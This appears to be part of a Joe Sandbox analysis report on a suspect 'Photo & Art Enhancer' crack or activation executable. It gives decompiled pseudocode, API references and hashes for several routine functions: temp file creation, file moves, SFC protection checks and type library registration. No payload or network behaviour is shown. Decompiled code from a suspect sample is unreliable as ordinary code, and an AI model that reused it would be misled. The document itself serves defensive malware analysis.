Function 0042F440 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0042F440(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				struct HDC__* _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t82;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t90;
				intOrPtr _t91;

				_t68 = __ecx;
				_t90 = _t91;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t85 = __ecx;
				_v8 = __edx;
				_t87 = __eax;
				_t67 = _a4;
				_push(_t90);
				_push(0x42f594);
				_push( *[fs:eax]);
				 *[fs:eax] = _t91;
				_v12 = GetDC(0);
				_push(_t90);
				_push(0x42f572);
				_push( *[fs:eax]);
				 *[fs:eax] = _t91;
				SelectObject(_v12, E0041A678(_v8, _a4, _t68, _t85, _t87));
				E00403494(_a4, _t87);
				E0042CDE4( *_t67, _t68,  &_v20);
				E0042CDBC( *_t67, _t68,  &_v24);
				_t88 = E0042CB04();
				if(_t88 < E00403574(_v20) && E0042C904( *((intOrPtr*)(_v20 + _t88))) != 0) {
					_t88 = _t88 + 1;
				}
				E00403778(_v20, _t88, 1,  &_v16);
				E004037B8( &_v20, _t88, 1);
				while(_v20 != 0 || _v16 != 0) {
					if(_t85 < E0042EAA8(_v12, _t67, 0,  *_t67, _t85, _t88)) {
						if(_v20 != 0) {
							E0042F38C( &_v20, _t67, _t85, _t88);
						}
						if(_v20 == 0 && _v16 != 0) {
							E00403400( &_v16);
							E00403494( &_v20, 0x42f5ac);
						}
						_push(_v16);
						_push(_v20);
						_push(_v24);
						E00403634();
						continue;
					}
					break;
				}
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(0x42f579);
				return ReleaseDC(0, _v12);
			}

0x0042f440
0x0042f441
0x0042f443
0x0042f445
0x0042f447
0x0042f449
0x0042f44b
0x0042f44d
0x0042f44e
0x0042f44f
0x0042f450
0x0042f452
0x0042f455
0x0042f457
0x0042f45c
0x0042f45d
0x0042f462
0x0042f465
0x0042f46f
0x0042f474
0x0042f475
0x0042f47a
0x0042f47d
0x0042f48d
0x0042f496
0x0042f4a0
0x0042f4aa
0x0042f4b7
0x0042f4c3
0x0042f4d4
0x0042f4d4
0x0042f4e3
0x0042f4f2
0x0042f53d
0x0042f557
0x0042f4fd
0x0042f502
0x0042f502
0x0042f50b
0x0042f516
0x0042f523
0x0042f523
0x0042f528
0x0042f52b
0x0042f52e
0x0042f538
0x00000000
0x0042f538
0x00000000
0x0042f557
0x0042f55b
0x0042f55e
0x0042f561
0x0042f571

APIs

GetDC.USER32(00000000), ref: 0042F46A

Part of subcall function 0041A678: CreateFontIndirectA.GDI32(?), ref: 0041A737

SelectObject.GDI32(?,00000000), ref: 0042F48D
ReleaseDC.USER32 ref: 0042F56C

Strings

...\, xrefs: 0042F51E

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CreateFontIndirectObjectReleaseSelect
String ID: ...\
API String ID: 3133960002-983595016
Opcode ID: 4dbb05239853b56f211487c34bba1e3065c43c6cc540eb48ddca839a47f377ff
Instruction ID: 6da19e17498f2b2ee05211f2735e4231f31b0ac4056ea50bc180adaf4849e001
Opcode Fuzzy Hash: 4dbb05239853b56f211487c34bba1e3065c43c6cc540eb48ddca839a47f377ff
Instruction Fuzzy Hash: 3E313370B00229ABDF11EF9AD851BAEB7B8EB48304FD0447BF414A7291C77C5D45CA59

Uniqueness

Uniqueness Score: -1.00%

Function 004555D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E004555D0(void* __eax, void* __ebx, void* __edx, void* __edi, struct HINSTANCE__* __esi) {
				char _v8;
				short _v8200;
				char _v8204;
				char _v8208;
				char _v8212;
				void* _t29;
				int _t41;
				char _t65;
				intOrPtr _t73;
				void* _t83;
				void* _t86;
				void* _t87;

				_t84 = __esi;
				_t86 = _t87;
				_push(__eax);
				_t29 = 2;
				do {
					_t87 = _t87 + 0xfffff004;
					_push(_t29);
					_t29 = _t29 - 1;
				} while (_t29 != 0);
				_push(__ebx);
				_push(__esi);
				_v8204 = 0;
				_v8208 = 0;
				_v8212 = 0;
				_v8 = 0;
				_t83 = __edx;
				_t65 = _v8;
				_push(_t86);
				_push(0x455744);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xfffffff4;
				if( *0x49f004 == 0) {
					E0042DD54( &_v8212);
					E0042C88C(_v8212,  &_v8208);
					E0040357C( &_v8208, "sfc.dll");
					E0040352C( &_v8204, E00403738(_v8208));
					_t84 = E0042E824(_v8204, _t65, 0x8000);
					if(_t84 != 0) {
						 *0x49f008 = GetProcAddress(_t84, "SfcIsFileProtected");
					}
					 *0x49f004 = 1;
				}
				if( *0x49f008 != 0) {
					E0042CC94(_t83,  &_v8);
					if(_t65 == 0) {
						E00454330(_v8, _t65, 0,  &_v8204, _t83, _t84);
						E00403494( &_v8, _v8204);
					}
					_t41 = E00403574(_v8);
					 *((short*)(_t86 + MultiByteToWideChar(0, 0, E00403738(_v8), _t41,  &_v8200, 0xfff) * 2 - 0x2004)) = 0;
					if(_v8200 == 0) {
						L11:
					} else {
						_push( &_v8200);
						_push(0);
						if( *0x49f008() == 0) {
							goto L11;
						}
					}
				}
				_pop(_t73);
				 *[fs:eax] = _t73;
				_push(0x45574b);
				E00403420( &_v8212, 3);
				return E00403400( &_v8);
			}

0x004555d0
0x004555d1
0x004555d3
0x004555d4
0x004555d9
0x004555d9
0x004555df
0x004555e0
0x004555e0
0x004555e9
0x004555ea
0x004555ee
0x004555f4
0x004555fa
0x00455600
0x00455603
0x00455605
0x00455609
0x0045560a
0x0045560f
0x00455612
0x0045561c
0x00455624
0x00455635
0x00455645
0x0045565d
0x00455672
0x00455676
0x00455683
0x00455683
0x00455688
0x00455688
0x00455696
0x004556a1
0x004556a8
0x004556b3
0x004556c1
0x004556c1
0x004556d5
0x004556ed
0x004556ff
0x00455714
0x00455701
0x00455707
0x00455708
0x00455712
0x00000000
0x00000000
0x00455712
0x004556ff
0x00455720
0x00455723
0x00455726
0x00455736
0x00455743

APIs

GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 0045567E
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00455744), ref: 004556E8

Strings

SfcIsFileProtected, xrefs: 00455678
sfc.dll, xrefs: 00455640

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressByteCharMultiProcWide
String ID: SfcIsFileProtected$sfc.dll
API String ID: 2508298434-591603554
Opcode ID: cd1d4ec634ffaaeb32f3c4dbc28009c9e63fbc03d90feba525fc8c0b3ebaedcf
Instruction ID: 311e8501e48ef86dedbd1e32416f62ff44579e2f461d143f7aa5c8e880f43ce1
Opcode Fuzzy Hash: cd1d4ec634ffaaeb32f3c4dbc28009c9e63fbc03d90feba525fc8c0b3ebaedcf
Instruction Fuzzy Hash: FC418670A00718DBEB20EB55DC95BAD77B8AB04309F5041B7A908E7293D7785F48DA5C

Uniqueness

Uniqueness Score: -1.00%

Function 004540B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E004540B8(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v13;
				signed int _v20;
				char _v24;
				char _v28;
				void* _t62;
				signed int _t65;
				intOrPtr _t79;
				void* _t84;
				void* _t87;

				_t66 = 0;
				_v24 = 0;
				_v28 = 0;
				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00403728(_v8);
				_push(_t87);
				_push(0x4541f2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe8;
				E0042C88C(_v8,  &_v24);
				E00403494( &_v8, _v24);
				_t84 = 0x123456;
				_t65 = 0;
				_v13 = 0;
				do {
					_t84 = _t84 + 1;
					if(_t84 > 0x1ffffff) {
						_t84 = 0;
					}
					_t92 = 0x123456 - _t84;
					if(0x123456 == _t84) {
						E0042D050(_v8, _t66,  &_v28, _t92);
						E00451C30(0x4c,  &_v24, _v28);
						_t66 = _v24;
						E0040909C(_v24, 1);
						E0040311C();
					}
					_push(_v8);
					_push("_iu");
					E00453F38(_t84, _t65,  &_v24, 0x123456, _t84);
					_push(_v24);
					_push(".tmp");
					E00403634();
					if(E0042D1D8(_t92) == 0) {
						_t65 = 1;
						_v13 = E0042D1B4(_v20);
						if(_v13 != 0) {
							_t62 = CreateFileA(E00403738(_v20), 0xc0000000, 0, 0, 2, 0x80, 0);
							_t65 = 0 | _t62 != 0xffffffff;
							if(1 != 0) {
								CloseHandle(_t62);
							}
						}
					}
				} while (_t65 == 0);
				E00403450(_v12, _t65, _v20, 0x123456, _t84);
				_pop(_t79);
				 *[fs:eax] = _t79;
				_push(E004541F9);
				E00403420( &_v28, 3);
				return E00403400( &_v8);
			}

0x004540c1
0x004540c3
0x004540c6
0x004540c9
0x004540cc
0x004540cf
0x004540d5
0x004540dc
0x004540dd
0x004540e2
0x004540e5
0x004540ee
0x004540f9
0x00454103
0x00454105
0x00454107
0x0045410b
0x0045410b
0x00454112
0x00454114
0x00454114
0x00454116
0x00454118
0x00454120
0x0045412d
0x00454132
0x0045413c
0x00454141
0x00454141
0x00454146
0x00454149
0x00454153
0x00454158
0x0045415b
0x00454168
0x00454177
0x00454179
0x00454183
0x0045418a
0x004541a7
0x004541af
0x004541b4
0x004541b7
0x004541b7
0x004541b4
0x0045418a
0x004541bc
0x004541ca
0x004541d1
0x004541d4
0x004541d7
0x004541e4
0x004541f1

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00499C8D,_iu,?,00000000,004541F2), ref: 004541A7
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00499C8D,_iu,?,00000000,004541F2), ref: 004541B7

Strings

.tmp, xrefs: 0045415B
_iu, xrefs: 00454149

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: .tmp$_iu
API String ID: 3498533004-10593223
Opcode ID: 395db152fd65c362e2974d92ef0648ae146372e30c305f9e092b113869095efe
Instruction ID: 578c6d25dcdad9d531da493d0199c9855db5075e5bb7f28aad5cf4ca392b9bb0
Opcode Fuzzy Hash: 395db152fd65c362e2974d92ef0648ae146372e30c305f9e092b113869095efe
Instruction Fuzzy Hash: F431C770E00119ABCB11EFA5C842B9EBBB5AF54309F60416AF804BB3C2D6385F4586A8

Uniqueness

Uniqueness Score: -1.00%

Function 004168A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004168A0(intOrPtr* __eax, void* __edi, void* __esi, void* __ebp) {
				char _v8;
				char _v12;
				struct _WNDCLASSA _v52;
				char _v116;
				struct _WNDCLASSA _v156;
				intOrPtr _v164;
				signed char _v185;
				void* __ebx;
				struct HINSTANCE__* _t32;
				signed int _t33;
				signed int _t35;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t55;
				intOrPtr* _t62;

				_t76 = __esi;
				_t75 = __edi;
				_t62 = __eax;
				 *((intOrPtr*)( *__eax + 0x5c))();
				if(_v164 == 0 && (_v185 & 0x00000040) != 0) {
					_v12 =  *((intOrPtr*)(__eax + 8));
					_v8 = 0xb;
					E004091BC(__eax, 0xf02f, 1, __edi, __esi, 0,  &_v12);
					E0040311C();
				}
				 *((intOrPtr*)(_t62 + 0xac)) = _v156.lpfnWndProc;
				_t32 =  *0x49e014; // 0x400000
				_t33 = GetClassInfoA(_t32,  &_v116,  &_v52);
				asm("sbb eax, eax");
				_t35 =  ~( ~_t33);
				if(_t35 == 0 || E00413ACC != _v52.lpfnWndProc) {
					if(_t35 != 0) {
						_t55 =  *0x49e014; // 0x400000
						UnregisterClassA( &_v116, _t55);
					}
					_v156.lpfnWndProc = E00413ACC;
					_t36 =  *0x49e014; // 0x400000
					_v156.hInstance = _t36;
					_v156.lpszClassName =  &_v116;
					if(RegisterClassA( &_v156) == 0) {
						E0040914C(_t62, 0xf02c, 1, _t75, _t76);
						E0040311C();
					}
				}
				 *0x49c2d8 = _t62;
				_t64 =  *_t62;
				 *((intOrPtr*)( *_t62 + 0x60))();
				if( *((intOrPtr*)(_t62 + 0xc0)) == 0) {
					_t64 = 0xf02d;
					E0040914C(_t62, 0xf02d, 1, _t75, _t76);
					E0040311C();
				}
				E004079D4( *((intOrPtr*)(_t62 + 0x40)));
				 *((intOrPtr*)(_t62 + 0x40)) = 0;
				E00418814(_t62);
				return E004156D0(_t62, E0041A678( *((intOrPtr*)(_t62 + 0x44)), _t62, _t64, _t75, _t76), 0x30, 1);
			}

0x004168a0
0x004168a0
0x004168a7
0x004168af
0x004168b7
0x004168c3
0x004168ca
0x004168e8
0x004168ed
0x004168ed
0x004168f6
0x00416909
0x0041690f
0x00416916
0x00416918
0x0041691c
0x0041692e
0x00416930
0x0041693b
0x0041693b
0x00416940
0x00416948
0x0041694d
0x00416955
0x00416966
0x00416974
0x00416979
0x00416979
0x00416966
0x0041697e
0x00416988
0x0041698a
0x00416994
0x00416996
0x004169a2
0x004169a7
0x004169a7
0x004169af
0x004169b6
0x004169bb
0x004169df

APIs

GetClassInfoA.USER32 ref: 0041690F
UnregisterClassA.USER32 ref: 0041693B
RegisterClassA.USER32 ref: 0041695E

Strings

@, xrefs: 004168B9

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Class$InfoRegisterUnregister
String ID: @
API String ID: 3749476976-2766056989
Opcode ID: 89bc6802e49400a59241b44313676a9451afc33bfe416d6d4d10535db5cdd165
Instruction ID: f0814f926fbfb3063bbfc520005841906eff1053595eb63299fc6e458af65efd
Opcode Fuzzy Hash: 89bc6802e49400a59241b44313676a9451afc33bfe416d6d4d10535db5cdd165
Instruction Fuzzy Hash: 70316E702043418BDB20EF69C485B9A77E5AB89308F04447FF985DF392DB39DD858B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0049B094 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0049B094(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				CHAR* _t42;
				char _t55;
				intOrPtr _t65;
				void* _t69;
				signed int _t71;
				void* _t75;

				_v24 = 0;
				_v16 = 0;
				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t75);
				_push(0x49b18a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t75 + 0xffffffe4;
				E00403400(_v12);
				E0042CDE4(_v8, 0,  &_v16);
				_t69 = 0;
				_t55 = 0;
				do {
					_v32 = _t55;
					_v28 = 0;
					E00407D84("isRS-%.3u.tmp", 0,  &_v32,  &_v24);
					E004035C0( &_v20, _v24, _v16);
					_t71 = GetFileAttributesA(E00403738(_v20));
					if(_t71 == 0xffffffff) {
						L5:
						_t42 = E00403738(_v20);
						if(MoveFileExA(E00403738(_v8), _t42, 1) == 0) {
							_t69 = _t69 + 1;
							if(_t69 == 0xa) {
								break;
							}
							goto L8;
						}
						E00403494(_v12, _v20);
						break;
					}
					if((_t71 & 0x00000010) != 0) {
						goto L8;
					}
					if((_t71 & 0x00000001) != 0) {
						SetFileAttributesA(E00403738(_v20), _t71 & 0xfffffffe);
					}
					goto L5;
					L8:
					_t55 = _t55 + 1;
				} while (_t55 != 0x3e8);
				_pop(_t65);
				 *[fs:eax] = _t65;
				_push(E0049B191);
				return E00403420( &_v24, 3);
			}

0x0049b09f
0x0049b0a2
0x0049b0a5
0x0049b0a8
0x0049b0ab
0x0049b0b0
0x0049b0b1
0x0049b0b6
0x0049b0b9
0x0049b0bf
0x0049b0ca
0x0049b0cf
0x0049b0d1
0x0049b0d3
0x0049b0d7
0x0049b0da
0x0049b0e8
0x0049b0f6
0x0049b109
0x0049b10e
0x0049b132
0x0049b137
0x0049b14d
0x0049b15c
0x0049b160
0x00000000
0x00000000
0x00000000
0x0049b160
0x0049b155
0x00000000
0x0049b155
0x0049b116
0x00000000
0x00000000
0x0049b11e
0x0049b12d
0x0049b12d
0x00000000
0x0049b162
0x0049b162
0x0049b163
0x0049b171
0x0049b174
0x0049b177
0x0049b189

APIs

GetFileAttributesA.KERNEL32(00000000,0049B9E4,00000000,0049B18A,?,?,00000000,0049E62C), ref: 0049B104
SetFileAttributesA.KERNEL32(00000000,00000000,00000000,0049B9E4,00000000,0049B18A,?,?,00000000,0049E62C), ref: 0049B12D
MoveFileExA.KERNEL32 ref: 0049B146

Strings

isRS-%.3u.tmp, xrefs: 0049B0E3

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: File$Attributes$Move
String ID: isRS-%.3u.tmp
API String ID: 3839737484-3657609586
Opcode ID: fe636f5d486f977561d955d8d27fc1c933ee631e33dfc5204804ac15784fdca6
Instruction ID: e58a6bb4d61ebf27a8f85bf79e18a3daf7ddf139a146e4c83f08b8ac6b3baeb0
Opcode Fuzzy Hash: fe636f5d486f977561d955d8d27fc1c933ee631e33dfc5204804ac15784fdca6
Instruction Fuzzy Hash: B2216470E10209ABCF04EFA9D9929AFBBB8EF44354F10453AB814B72D1D7385E018A99

Uniqueness

Uniqueness Score: -1.00%

Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00404D2A(int __eax) {
				intOrPtr* _t7;
				intOrPtr* _t8;
				signed int _t15;
				signed int _t19;
				intOrPtr _t20;
				unsigned int _t21;
				char* _t29;
				char* _t30;
				void* _t46;

				 *0x49e024 = __eax;
				if( *0x49e034 == 0) {
					goto L5;
				} else {
					_t46 =  *0x49e418 - 1;
					if(_t46 < 0) {
						L17:
						ExitProcess( *0x49e024);
					} else {
						if(_t46 == 0 || __eax != 0) {
							while(1) {
								L5:
								_t7 =  *0x49e028; // 0x406e8c
								_t8 = _t7;
								if(_t8 == 0) {
									break;
								}
								 *0x49e028 = 0;
								 *_t8();
							}
							if( *0x49e02c != 0) {
								_t19 =  *0x49e024; // 0x0
								_t29 = "  at 00000000";
								do {
									_t2 = _t19 % 0xa;
									_t19 = _t19 / 0xa;
									 *_t29 = _t2 + 0x30;
									_t29 = _t29 - 1;
								} while (_t19 != 0);
								_t30 = 0x49c090;
								_t20 =  *0x49e02c; // 0x0
								_t21 = _t20 - 0x40121c;
								do {
									 *_t30 =  *((intOrPtr*)((_t21 & 0x0000000f) + 0x404e44));
									_t30 = _t30 - 1;
									_t21 = _t21 >> 4;
								} while (_t21 != 0);
								if( *0x49e035 != 0) {
									E0040500C(0x49e208, "Runtime error     at 00000000");
									E00404F8F();
								} else {
									MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
								}
							}
							E00404CF0(0x49e03c);
							E00404CF0(0x49e208);
							E00401A90();
							if( *0x49e418 == 0) {
								E0040331C();
								goto L17;
							}
						}
					}
				}
				E0040331C();
				 *0x49e418 = 0;
				_t15 =  *0x49e024; // 0x0
				asm("sbb eax, eax");
				return  ~_t15 + 1;
			}

0x00404d2c
0x00404d38
0x00000000
0x00404d3a
0x00404d3a
0x00404d41
0x00404e07
0x00404e0d
0x00404d47
0x00404d47
0x00404d51
0x00404d51
0x00404d51
0x00404d56
0x00404d58
0x00000000
0x00000000
0x00404d5c
0x00404d62
0x00404d62
0x00404d6d
0x00404d6f
0x00404d74
0x00404d7e
0x00404d80
0x00404d80
0x00404d85
0x00404d87
0x00404d88
0x00404d8c
0x00404d91
0x00404d96
0x00404d9b
0x00404da6
0x00404da8
0x00404da9
0x00404da9
0x00404db5
0x00404dd6
0x00404ddb
0x00404db7
0x00404dc5
0x00404dc5
0x00404db5
0x00404de5
0x00404def
0x00404df4
0x00404e00
0x00404e02
0x00000000
0x00404e02
0x00404e00
0x00404d47
0x00404d41
0x00404e12
0x00404e17
0x00404e1e
0x00404e25
0x00404e41

APIs

MessageBoxA.USER32 ref: 00404DC5
ExitProcess.KERNEL32 ref: 00404E0D

Strings

Error, xrefs: 00404DB9
Runtime error at 00000000, xrefs: 00404DBE, 00404DD1

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000
API String ID: 1220098344-2970929446
Opcode ID: 3b61d1fed352f5282028831249daba76a748604d35a297349552cc65daff4f89
Instruction ID: d5004cfacfd42fd5c2be0182736057b03719568bea5446043c3b888183e5f090
Opcode Fuzzy Hash: 3b61d1fed352f5282028831249daba76a748604d35a297349552cc65daff4f89
Instruction Fuzzy Hash: AE21B360A442519AEB15E7B7EC857163BD197E9348F048177E700B73E3C6BC984487AE

Uniqueness

Uniqueness Score: -1.00%

Function 0045742C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0045742C(void* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr* _t23;
				intOrPtr _t39;
				void* _t45;
				void* _t46;
				intOrPtr _t47;

				_t43 = __esi;
				_t42 = __edi;
				_t45 = _t46;
				_t47 = _t46 + 0xfffffff4;
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_t32 = __eax;
				_push(_t45);
				_push(0x457514);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				E0042CC94(__eax,  &_v16);
				_v8 = E00403CA4(_v16);
				if(_v8 == 0) {
					E00409090();
				}
				_push(_t45);
				_push(0x4574f7);
				_push( *[fs:edx]);
				 *[fs:edx] = _t47;
				_push( &_v12);
				_t19 = _v8;
				_push(_t19);
				L0042D0F4();
				_t49 = _t19;
				if(_t19 != 0) {
					E00453CAC("LoadTypeLib", _t32, _t19, _t42, _t43, _t49);
				}
				_push(_t45);
				_push(0x4574d9);
				_push( *[fs:edx]);
				 *[fs:edx] = _t47;
				_push(0);
				_push(_v8);
				_t21 = _v12;
				_push(_t21);
				L0042D0FC();
				_t50 = _t21;
				if(_t21 != 0) {
					E00453CAC("RegisterTypeLib", _t32, _t21, _t42, _t43, _t50);
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
				_t23 = _v12;
				return  *((intOrPtr*)( *_t23 + 8))(_t23, E004574E0);
			}

0x0045742c
0x0045742c
0x0045742d
0x0045742f
0x00457433
0x00457434
0x00457437
0x0045743a
0x0045743e
0x0045743f
0x00457444
0x00457447
0x0045744f
0x0045745c
0x00457463
0x00457465
0x00457465
0x0045746c
0x0045746d
0x00457472
0x00457475
0x0045747b
0x0045747c
0x0045747f
0x00457480
0x00457485
0x00457487
0x00457490
0x00457490
0x00457497
0x00457498
0x0045749d
0x004574a0
0x004574a3
0x004574a8
0x004574a9
0x004574ac
0x004574ad
0x004574b2
0x004574b4
0x004574bd
0x004574bd
0x004574c4
0x004574c7
0x004574cf
0x004574d8

APIs

Part of subcall function 0042CC94: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042CCB8

Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9

LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00457480
RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 004574AD

Strings

RegisterTypeLib, xrefs: 004574B8
LoadTypeLib, xrefs: 0045748B

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
String ID: LoadTypeLib$RegisterTypeLib
API String ID: 1312246647-2435364021
Opcode ID: ef98400a3cb6d0e3d8d993fb867b0761591a4800f398f9cc68cb898a501ed530
Instruction ID: 9f3c69dbed6527a7536611739b590712afd4786c139aba5f8c5ce656fa2fa7d6
Opcode Fuzzy Hash: ef98400a3cb6d0e3d8d993fb867b0761591a4800f398f9cc68cb898a501ed530
Instruction Fuzzy Hash: 0D11B130B04604BFDB11DFA6DD51A5ABBADEB89305F1084B6BC04D3652EA389A04CA18

Uniqueness

Uniqueness Score: -1.00%

